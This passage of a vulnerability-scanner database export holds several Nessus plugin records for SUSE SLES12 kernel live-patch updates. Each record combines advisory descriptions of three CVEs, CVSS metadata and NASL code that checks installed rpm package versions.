(bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in drivers/gpu/drm/udl/udl_fb.c had an integer-overflow vulnerability allowing local users with access to the udldrmfb driver to obtain full read and write permissions on kernel physical pages, resulting in a code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-1540-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110373", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1540-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1540-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110373);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/12/01 13:19:05\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1540-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_86 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181540-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?88a6ec93\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-1042=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_86-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_86-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_86-default-9-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_86-xen-9-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:14", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.61-52_122 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in drivers/gpu/drm/udl/udl_fb.c had an integer-overflow vulnerability allowing local users with access to the udldrmfb driver to obtain full read and write permissions on kernel physical pages, resulting in a code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-1526-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110360", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1526-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1526-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110360);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/12/01 13:19:05\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1526-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_122 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181526-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ae6072ce\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-1038=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_122-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_122-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_122-default-5-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_122-xen-5-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:13", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.74-60_64_63 fixes several issues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in drivers/gpu/drm/udl/udl_fb.c had an integer-overflow vulnerability allowing local users with access to the udldrmfb driver to obtain full read and write permissions on kernel physical pages, resulting in a code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-1519-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110353", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1519-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1519-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110353);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/12/01 13:19:05\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1519-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_63 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181519-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?994588fa\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1051=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1051=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_63-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_63-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_63-default-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_63-xen-6-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:14", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.74-60_64_51 fixes several issues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or 